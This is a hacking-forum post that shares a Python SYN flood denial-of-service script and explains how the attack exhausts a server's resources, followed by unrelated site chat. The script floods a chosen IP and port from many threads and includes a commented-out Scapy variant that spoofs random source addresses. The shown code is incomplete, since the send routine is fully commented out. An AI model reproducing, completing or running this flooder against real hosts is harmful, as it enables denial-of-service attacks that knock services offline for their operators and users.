SynFlood Dos [Python]

  • Hello Guest! Welcome to ConsoleCrunch, to help support our site check out the premium upgrades HERE! to get exclusive access to our hidden content.
  • Unable to load portions of the website...
    If you use an ad blocker addon, you should disable it because it interferes with several elements of the site and blocks more than just adverts.
  • Read Rules Before Posting Post Virus Scans with every program.

ZionHD

Leader
Retired Staff
Nov 8, 2014
184
215
53
This script uses multiple threads to flood your target using the Syn/ACK 3 way handshake attack. This drops connections once it finishes the second step, I believe correct me if I'm wrong. This will make the target wait for a packet that will never come and cause it to be unresponsive. The reason it crashes or becomes unresponsive is because the server is consuming a lot of resources by waiting for a packet that will never come plus your flooding it repeatedly causing multiple connections to be opened. This is what I believe. This script is coded in python so it should end with .py if you save it on your pc or server.

Wiki's Definition of SynFlood:
A SYN flood is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic.

Code:
#!/usr/bin/env python
#########################################
# 
# SYNflood.py - A multithreaded SYN Flooder
# By Brandon Smith
# brandon.smith@studiobebop.net
#
# This script is a demonstration of a SYN/ACK 3 Way Handshake Attack 
# as discussed by Halla of Information Leak
#
#########################################
import socket
import random
import sys
import threading
#import scapy # Uncomment this if you're planning to use Scapy

###
# Global Config
###

interface    = None
target       = None
port         = None
thread_limit = 200
total        = 0

#!# End Global Config #!#

class sendSYN(threading.Thread):
    global target, port
    def __init__(self):
        threading.Thread.__init__(self)

    def run(self):
        # There are two different ways you can go about pulling this off.
        # You can either:
        #   - 1. Just open a socket to your target on any old port
        #   - 2. Or you can be a cool kid and use scapy to make it look cool, and overcomplicated!
        #
        # (Uncomment whichever method you'd like to use)

        # Method 1 -
#        s = socket.socket()
#        s.connect((target,port))

        # Methods 2 -
#        i = scapy.IP()
#        i.src = "%i.%i.%i.%i" % (random.randint(1,254),random.randint(1,254),random.randint(1,254),random.randint(1,254))
#        i.dst = target

#        t = scapy.TCP()
#        t.sport = random.randint(1,65535)
#        t.dport = port
#        t.flags = 'S'

#        scapy.send(i/t, verbose=0)

if __name__ == "__main__":
    # Make sure we have all the arguments we need
    if len(sys.argv) != 4:
        print "Usage: %s <Interface> <Target IP> <Port>" % sys.argv[0]
        exit()

    # Prepare our variables
    interface        = sys.argv[1]
    target           = sys.argv[2]
    port             = int(sys.argv[3])
#    scapy.conf.iface = interface # Uncomment this if you're going to use Scapy

    # Hop to it!
    print "Flooding %s:%i with SYN packets." % (target, port)
    while True:
        if threading.activeCount() < thread_limit: 
            sendSYN().start()
            total += 1
            sys.stdout.write("\rTotal packets sent:\t\t\t%i" % total)
 
  • Like
Reactions: Saad Asad
General chit-chat
Help Users
  • No one is chatting at the moment.
  • @ HerbL27:
    "right to be forgotten"
  • @ QM|T_JinX:
    @accurynx sorry to say i cant find it at the moment best thing to do is contact @Younis and ill a proof it when done
  • @ HerbL27:
    only know this cos i work for big british company lol
  • @ HerbL27:
    yeah i appreciate your help and support anyways, thank you
  • @ QM|T_JinX:
    ok well i didnt know that haha
  • @ QM|T_JinX:
    yea np bro wish i could help you out
  • @ HerbL27:
    here the big man is
  • @ QM|T_JinX:
    haha yea
  • @ HerbL27:
    @Younis could you please delete this account (HerbL27) and change the username for accurynx to ohhsodead instead of creating a new account
  • @ lurch6661:
    dam cc be bumping
  • @ lurch6661:
    console crunch 4 life
  • @ HerbL27:
    does the site have a discord server?
  • @ lurch6661:
    i believe not
  • @ QM|T_JinX:
    no we dont have a discord
  • @ HerbL27:
    ahh weird it should do
  • @ QM|T_JinX:
    well it is what it is i geuss
  • @ lurch6661:
    thats why lurch should be president
  • @ QM|T_JinX:
    work your way up to Admin hahaha
  • @ lurch6661:
    lol
  • Chat Bot:
    Christo has joined the room.
  • Chat Bot:
    thamanee is our newest member. Welcome!
  • Chat Bot:
    Yassinos is our newest member. Welcome!
  • Chat Bot:
    Thiago L121 is our newest member. Welcome!
    Chat Bot: Thiago L121 is our newest member. Welcome!